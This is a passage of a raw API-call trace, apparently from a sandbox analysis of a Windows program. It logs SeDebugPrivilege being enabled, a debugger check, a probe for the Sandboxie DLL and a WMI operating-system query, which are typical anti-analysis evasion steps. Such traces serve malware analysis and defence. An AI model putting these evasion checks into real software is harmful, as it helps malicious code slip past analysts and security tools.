lpRect=0x2ee5d4) returned 1 [0131.786] GetWindowRect (in: hWnd=0x10160, lpRect=0x2ee5d4 | out: lpRect=0x2ee5d4) returned 1 [0131.786] RedrawWindow (hWnd=0x10160, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0131.786] GetSystemMenu (hWnd=0x10160, bRevert=0) returned 0x2015d [0131.786] GetWindowPlacement (in: hWnd=0x10160, lpwndpl=0x2ee8ac | out: lpwndpl=0x2ee8ac) returned 1 [0131.786] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0131.786] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0131.786] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0131.786] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0131.786] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0131.786] SetWindowLongW (hWnd=0x1015c, nIndex=-8, dwNewLong=65888) returned 65886 [0131.847] GetCurrentProcessId () returned 0x6b8 [0131.850] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x2ee28c | out: lpLuid=0x2ee28c*(LowPart=0x14, HighPart=0)) returned 1 [0131.851] GetCurrentProcess () returned 0xffffffff [0131.851] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x2ee288 | out: TokenHandle=0x2ee288*=0x248) returned 1 [0131.851] AdjustTokenPrivileges (in: TokenHandle=0x248, DisableAllPrivileges=0, NewState=0x222e4dc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0131.851] CloseHandle (hObject=0x248) returned 1 [0131.852] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x6b8) returned 0x248 [0131.852] GetExitCodeProcess (in: hProcess=0x248, lpExitCode=0x222e468 | out: lpExitCode=0x222e468*=0x103) returned 1 [0131.859] CheckRemoteDebuggerPresent (in: hProcess=0x248, pbDebuggerPresent=0x2ee9e4 | out: pbDebuggerPresent=0x2ee9e4) returned 1 [0131.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SbieDll.dll", cchWideChar=11, lpMultiByteStr=0x2ee984, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SbieDll.dlltëQ\x1b", lpUsedDefaultChar=0x0) returned 11 [0131.872] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0132.397] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x250 [0132.398] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x254 [0132.406] SetEvent (hEvent=0x254) returned 1 [0132.411] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x2ee8ec*=0x250, lpdwindex=0x2ee70c | out: lpdwindex=0x2ee70c) returned 0x0 [0132.633] CoGetContextToken (in: pToken=0x2ee7b8 | out: pToken=0x2ee7b8) returned 0x0 [0132.633] CoGetContextToken (in: pToken=0x2ee718 | out: pToken=0x2ee718) returned 0x0 [0132.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0820, riid=0x2ee7e8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x2ee7e4 | out: ppvObject=0x2ee7e4*=0x73b0820) returned 0x0 [0132.634] WbemDefPath:IUnknown:AddRef (This=0x73b0820) returned 0x3 [0132.634] WbemDefPath:IUnknown:Release (This=0x73b0820) returned 0x2 [0132.637] WbemDefPath:IWbemPath:SetText (This=0x73b0820, uMode=0x4, pszPath="Win32_OperatingSystem") returned 0x0 [0132.637] WbemDefPath:IWbemPath:GetInfo (in: This=0x73b0820, uRequestedInfo=0x0, puResponse=0x2ee998 | out: puResponse=0x2ee998*=0xc15) returned 0x0 [0132.638] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x73b0820, puCount=0x2ee990 | out: puCount=0x2ee990*=0x0) returned 0x0 [0132.639] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2b4 [0132.639] SetEvent (hEvent=0x254) returned 1 [0132.639] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x2ee1ec*=0x2b4, lpdwindex=0x2ee00c | out: lpdwindex=0x2ee00c) returned 0x0 [0132.641] CoGetContextToken (in: pToken=0x2ee0b8 | out: pToken=0x2ee0b8) returned 0x0 [0132.641] CoGetContextToken (in: pToken=0x2ee018 | out: pToken=0x2ee018) returned 0x0 [0132.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x73b0998, riid=0x2ee0e8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x2ee0e4 | out: ppvObject=0x2ee0e4*=0x73b0998) returned 0x0 [0132.641] WbemDefPath:IUnknown:AddRef (This=0x73b0998) returned 0x3 [0132.641] WbemDefPath:IUnknown:Release (This=0x73b0998) returned 0x2 [0132.641] WbemDefPath:IWbemPath:SetText (This=0x73b0998, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0132.641] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x73b0998, puCount=0x2ee968 | out: puCount=0x2ee968*=0x2) returned 0x0 [0132.642] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=4, puBuffLength=0x2ee964*=0x0, pszText=0x0 | out: puBuffLength=0x2ee964*=0xf, pszText=0x0) returned 0x0 [0132.642] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=4, puBuffLength=0x2ee964*=0xf, pszText="00000000000000" | out: puBuffLength=0x2ee964*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0132.650] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x2ee804*=0x2c8, lpdwindex=0x2ee6b4 | out: lpdwindex=0x2ee6b4) returned 0x0 [0133.537] CoGetContextToken (in: pToken=0x2ee5c0 | out: pToken=0x2ee5c0) returned 0x0 [0133.537] CoGetContextToken (in: pToken=0x2ee568 | out: pToken=0x2ee568) returned 0x0 [0133.537] IUnknown:QueryInterface (in: This=0x73c138, riid=0x74c13c98*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee548 | out: ppvObject=0x2ee548*=0x73c148) returned 0x0 [0133.539] CObjectContext::ContextCallback () returned 0x0 [0133.541] BeginPaint (in: hWnd=0x10160, lpPaint=0x2ed804 | out: lpPaint=0x2ed804) returned 0x1401007f [0133.541] GetWindowPlacement (in: hWnd=0x10160, lpwndpl=0x2ed560 | out: lpwndpl=0x2ed560) returned 1 [0133.541] GetClientRect (in: hWnd=0x10160, lpRect=0x2ed50c | out: lpRect=0x2ed50c) returned 1 [0133.542] GetWindowTextLengthW (hWnd=0x10160) returned 9 [0133.542] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0133.542] GetSystemMetrics (nIndex=42) returned 0 [0133.542] GetWindowTextW (in: hWnd=0x10160, lpString=0x2ed3d0, nMaxCount=10 | out: lpString="no reason") returned 9 [0133.542] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xd, wParam=0xa, lParam=0x2ed3d0) returned 0x9 [0133.542] GetClientRect (in: hWnd=0x10160, lpRect=0x2ed414 | out: lpRect=0x2ed414) returned 1 [0133.542] GetCurrentObject (hdc=0x1401007f, type=0x1) returned 0x1b00017 [0133.542] GetCurrentObject (hdc=0x1401007f, type=0x2) returned 0x1900010 [0133.542] GetCurrentObject (hdc=0x1401007f, type=0x7) returned 0x60501e4 [0133.542] GetCurrentObject (hdc=0x1401007f, type=0x6) returned 0x18a002e [0133.542] SaveDC (hdc=0x1401007f) returned 1 [0133.542] GetNearestColor (hdc=0x1401007f, color=0xf0f0f0) returned 0xf0f0f0 [0133.542] CreateSolidBrush (color=0xf0f0f0) returned 0x151001df [0133.543] FillRect (hDC=0x1401007f, lprc=0x2ed2b4, hbr=0x151001df) returned 1 [0133.543] DeleteObject (ho=0x151001df) returned 1 [0133.543] RestoreDC (hdc=0x1401007f, nSavedDC=-1) returned 1 [0133.544] GdipCreateHalftonePalette () returned 0x1b0801dd [0133.544] SelectPalette (hdc=0x1401007f, hPal=0x1b0801dd, bForceBkgd=1) returned 0x188000b [0133.544] GetWindowTextLengthW (hWnd=0x10160) returned 9 [0133.544] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0133.544] GetSystemMetrics (nIndex=42) returned 0 [0133.544] GetWindowTextW (in: hWnd=0x10160, lpString=0x2ed798, nMaxCount=10 | out: lpString="no reason") returned 9 [0133.544] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xd, wParam=0xa, lParam=0x2ed798) returned 0x9 [0133.545] SelectPalette (hdc=0x1401007f, hPal=0x188000b, bForceBkgd=0) returned 0x1b0801dd [0133.545] EndPaint (hWnd=0x10160, lpPaint=0x2ed800) returned 1 [0133.548] IUnknown:Release (This=0x73c148) returned 0x1 [0133.548] CoUnmarshalInterface (in: pStm=0x76a9a0, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ee5b0 | out: ppv=0x2ee5b0*=0x78fd44) returned 0x0 [0133.548] CoMarshalInterface (pStm=0x76a9a0, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x78fd44, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0133.548] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee454 | out: ppvObject=0x2ee454*=0x78fd44) returned 0x0 [0133.548] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2ee410 | out: ppvObject=0x2ee410*=0x0) returned 0x80004002 [0133.549] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x74cbfe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2ee22c | out: ppvObject=0x2ee22c*=0x0) returned 0x80004002 [0133.550] WbemLocator:IUnknown:AddRef (This=0x78fd44) returned 0x3 [0133.550] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x2edd6c | out: ppvObject=0x2edd6c*=0x0) returned 0x80004002 [0133.550] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x2edd1c | out: ppvObject=0x2edd1c*=0x0) returned 0x80004002 [0133.550] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edd28 | out: ppvObject=0x2edd28*=0x78fca4) returned 0x0 [0133.550] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x78fca4, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2edd30 | out: pCid=0x2edd30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.550] WbemLocator:IUnknown:Release (This=0x78fca4) returned 0x3 [0133.550] CoGetContextToken (in: pToken=0x2edd88 | out: pToken=0x2edd88) returned 0x0 [0133.550] IUnknown:QueryInterface (in: This=0x73bfc8, riid=0x74cbd8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edd4c | out: ppvObject=0x2edd4c*=0x73bfd4) returned 0x0 [0133.551] IComThreadingInfo:GetCurrentApartmentType (in: This=0x73bfd4, pAptType=0x2edd90 | out: pAptType=0x2edd90*=3) returned 0x0 [0133.551] IUnknown:Release (This=0x73bfd4) returned 0x0 [0133.551] CoGetObjectContext (in: riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x78bf24 | out: ppv=0x78bf24*=0x73bfc8) returned 0x0 [0133.551] CoGetContextToken (in: pToken=0x2ee190 | out: pToken=0x2ee190) returned 0x0 [0133.551] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee220 | out: ppvObject=0x2ee220*=0x78fd2c) returned 0x0 [0133.551] WbemLocator:IRpcOptions:Query (in: This=0x78fd2c, pPrx=0x78fd44, dwProperty=2, pdwValue=0x2ee248 | out: pdwValue=0x2ee248) returned 0x0 [0133.551] WbemLocator:IUnknown:Release (This=0x78fd2c) returned 0x3 [0133.551] WbemLocator:IUnknown:Release (This=0x78fd44) returned 0x2 [0133.551] WbemLocator:IUnknown:Release (This=0x78fd44) returned 0x1 [0133.552] CoGetContextToken (in: pToken=0x2ee500 | out: pToken=0x2ee500) returned 0x0 [0133.552] WbemLocator:IUnknown:AddRef (This=0x78fd44) returned 0x2 [0133.552] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7bc | out: ppvObject=0x2ee7bc*=0x78fd24) returned 0x0 [0133.552] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x78fd24, pProxy=0x78fd44, pAuthnSvc=0x2ee80c, pAuthzSvc=0x2ee808, pServerPrincName=0x2ee800, pAuthnLevel=0x2ee804, pImpLevel=0x2ee7f4, pAuthInfo=0x2ee7f8, pCapabilites=0x2ee7fc | out: pAuthnSvc=0x2ee80c*=0xa, pAuthzSvc=0x2ee808*=0x0, pServerPrincName=0x2ee800, pAuthnLevel=0x2ee804*=0x6, pImpLevel=0x2ee7f4*=0x2, pAuthInfo=0x2ee7f8, pCapabilites=0x2ee7fc*=0x1) returned 0x0 [0133.552] WbemLocator:IUnknown:Release (This=0x78fd24) returned 0x2 [0133.552] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x740e10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7b0 | out: ppvObject=0x2ee7b0*=0x78fd44) returned 0x0 [0133.552] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7ac | out: ppvObject=0x2ee7ac*=0x78fd24) returned 0x0 [0133.553] WbemLocator:IClientSecurity:SetBlanket (This=0x78fd24, pProxy=0x78fd44, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.553] WbemLocator:IUnknown:Release (This=0x78fd24) returned 0x3 [0133.553] WbemLocator:IUnknown:Release (This=0x78fd44) returned 0x2 [0133.553] CoTaskMemFree (pv=0x795148) [0133.553] WbemLocator:IUnknown:Release (This=0x78fd44) returned 0x1 [0133.553] SysStringLen (param_1=0x0) returned 0x0 [0133.553] CoGetContextToken (in: pToken=0x2ee778 | out: pToken=0x2ee778) returned 0x0 [0133.553] CoGetContextToken (in: pToken=0x2ee6d8 | out: pToken=0x2ee6d8) returned 0x0 [0133.553] WbemLocator:IUnknown:QueryInterface (in: This=0x78fd44, riid=0x2ee7a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x2ee7a4 | out: ppvObject=0x2ee7a4*=0x73bca1c) returned 0x0 [0133.553] WbemLocator:IUnknown:AddRef (This=0x73bca1c) returned 0x3 [0133.554] WbemLocator:IUnknown:Release (This=0x73bca1c) returned 0x2 [0133.554] CoGetContextToken (in: pToken=0x2ee738 | out: pToken=0x2ee738) returned 0x0 [0133.554] WbemLocator:IUnknown:AddRef (This=0x73bca1c) returned 0x3 [0133.554] WbemLocator:IUnknown:QueryInterface (in: This=0x73bca1c, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7bc | out: ppvObject=0x2ee7bc*=0x78fd24) returned 0x0 [0133.554] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x78fd24, pProxy=0x73bca1c, pAuthnSvc=0x2ee80c, pAuthzSvc=0x2ee808, pServerPrincName=0x2ee800, pAuthnLevel=0x2ee804, pImpLevel=0x2ee7f4, pAuthInfo=0x2ee7f8, pCapabilites=0x2ee7fc | out: pAuthnSvc=0x2ee80c*=0xa, pAuthzSvc=0x2ee808*=0x0, pServerPrincName=0x2ee800, pAuthnLevel=0x2ee804*=0x6, pImpLevel=0x2ee7f4*=0x2, pAuthInfo=0x2ee7f8, pCapabilites=0x2ee7fc*=0x1) returned 0x0 [0133.554] WbemLocator:IUnknown:Release (This=0x78fd24) returned 0x3 [0133.554] WbemLocator:IUnknown:QueryInterface (in: This=0x73bca1c, riid=0x740e10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7b0 | out: ppvObject=0x2ee7b0*=0x78fd44) returned 0x0 [0133.554] WbemLocator:IUnknown:QueryInterface (in: This=0x73bca1c, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7ac | out: ppvObject=0x2ee7ac*=0x78fd24) returned 0x0 [0133.554] WbemLocator:IClientSecurity:SetBlanket (This=0x78fd24, pProxy=0x73bca1c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.554] WbemLocator:IUnknown:Release (This=0x78fd24) returned 0x4 [0133.554] WbemLocator:IUnknown:Release (This=0x78fd44) returned 0x3 [0133.554] CoTaskMemFree (pv=0x795148) [0133.554] WbemLocator:IUnknown:Release (This=0x73bca1c) returned 0x2 [0133.554] SysStringLen (param_1=0x0) returned 0x0 [0133.554] CoGetContextToken (in: pToken=0x2ee6b0 | out: pToken=0x2ee6b0) returned 0x0 [0133.554] WbemLocator:IUnknown:AddRef (This=0x73bca1c) returned 0x3 [0133.554] IWbemServices:ExecQuery (in: This=0x73bca1c, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x2ee8c8 | out: ppEnum=0x2ee8c8*=0x73bd3d4) returned 0x0 [0133.584] IUnknown:QueryInterface (in: This=0x73bd3d4, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee720 | out: ppvObject=0x2ee720*=0x73bd3d8) returned 0x0 [0133.584] IClientSecurity:QueryBlanket (in: This=0x73bd3d8, pProxy=0x73bd3d4, pAuthnSvc=0x2ee770, pAuthzSvc=0x2ee76c, pServerPrincName=0x2ee764, pAuthnLevel=0x2ee768, pImpLevel=0x2ee758, pAuthInfo=0x2ee75c, pCapabilites=0x2ee760 | out: pAuthnSvc=0x2ee770*=0xa, pAuthzSvc=0x2ee76c*=0x0, pServerPrincName=0x2ee764, pAuthnLevel=0x2ee768*=0x6, pImpLevel=0x2ee758*=0x2, pAuthInfo=0x2ee75c, pCapabilites=0x2ee760*=0x1) returned 0x0 [0133.584] IUnknown:Release (This=0x73bd3d8) returned 0x1 [0133.584] IUnknown:QueryInterface (in: This=0x73bd3d4, riid=0x740e10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee714 | out: ppvObject=0x2ee714*=0x79601c) returned 0x0 [0133.584] IUnknown:QueryInterface (in: This=0x73bd3d4, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee710 | out: ppvObject=0x2ee710*=0x73bd3d8) returned 0x0 [0133.584] IClientSecurity:SetBlanket (This=0x73bd3d8, pProxy=0x73bd3d4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.587] IUnknown:Release (This=0x73bd3d8) returned 0x2 [0133.587] WbemLocator:IUnknown:Release (This=0x79601c) returned 0x1 [0133.587] CoTaskMemFree (pv=0x795178) [0133.587] IUnknown:QueryInterface (in: This=0x73bd3d4, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee30c | out: ppvObject=0x2ee30c*=0x79601c) returned 0x0 [0133.587] WbemLocator:IUnknown:QueryInterface (in: This=0x79601c, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2ee2c8 | out: ppvObject=0x2ee2c8*=0x0) returned 0x80004002 [0133.588] WbemLocator:IUnknown:QueryInterface (in: This=0x79601c, riid=0x74cbfe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2ee0e4 | out: ppvObject=0x2ee0e4*=0x0) returned 0x80004002 [0133.588] WbemLocator:IUnknown:AddRef (This=0x79601c) returned 0x3 [0133.588] WbemLocator:IUnknown:QueryInterface (in: This=0x79601c, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x2edc24 | out: ppvObject=0x2edc24*=0x0) returned 0x80004002 [0133.588] WbemLocator:IUnknown:QueryInterface (in: This=0x79601c, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x2edbd4 | out: ppvObject=0x2edbd4*=0x0) returned 0x80004002 [0133.589] WbemLocator:IUnknown:QueryInterface (in: This=0x79601c, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edbe0 | out: ppvObject=0x2edbe0*=0x795f7c) returned 0x0 [0133.589] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x795f7c, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2edbe8 | out: pCid=0x2edbe8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.589] WbemLocator:IUnknown:Release (This=0x795f7c) returned 0x3 [0133.589] CoGetContextToken (in: pToken=0x2edc40 | out: pToken=0x2edc40) returned 0x0 [0133.589] CoGetContextToken (in: pToken=0x2ee048 | out: pToken=0x2ee048) returned 0x0 [0133.589] WbemLocator:IUnknown:QueryInterface (in: This=0x79601c, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee0d8 | out: ppvObject=0x2ee0d8*=0x796004) returned 0x0 [0133.589] WbemLocator:IRpcOptions:Query (in: This=0x796004, pPrx=0x79601c, dwProperty=2, pdwValue=0x2ee100 | out: pdwValue=0x2ee100) returned 0x80004002 [0133.589] WbemLocator:IUnknown:Release (This=0x796004) returned 0x3 [0133.589] WbemLocator:IUnknown:Release (This=0x79601c) returned 0x2 [0133.589] CoGetContextToken (in: pToken=0x2ee620 | out: pToken=0x2ee620) returned 0x0 [0133.589] CoGetContextToken (in: pToken=0x2ee580 | out: pToken=0x2ee580) returned 0x0 [0133.589] WbemLocator:IUnknown:QueryInterface (in: This=0x79601c, riid=0x2ee650*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x2ee64c | out: ppvObject=0x2ee64c*=0x73bd3d4) returned 0x0 [0133.589] IUnknown:AddRef (This=0x73bd3d4) returned 0x4 [0133.589] IUnknown:Release (This=0x73bd3d4) returned 0x3 [0133.589] IUnknown:Release (This=0x73bd3d4) returned 0x2 [0133.589] WbemLocator:IUnknown:Release (This=0x73bca1c) returned 0x2 [0133.589] SysStringLen (param_1=0x0) returned 0x0 [0133.589] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x73b0998, puCount=0x2ee914 | out: puCount=0x2ee914*=0x2) returned 0x0 [0133.589] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=4, puBuffLength=0x2ee910*=0x0, pszText=0x0 | out: puBuffLength=0x2ee910*=0xf, pszText=0x0) returned 0x0 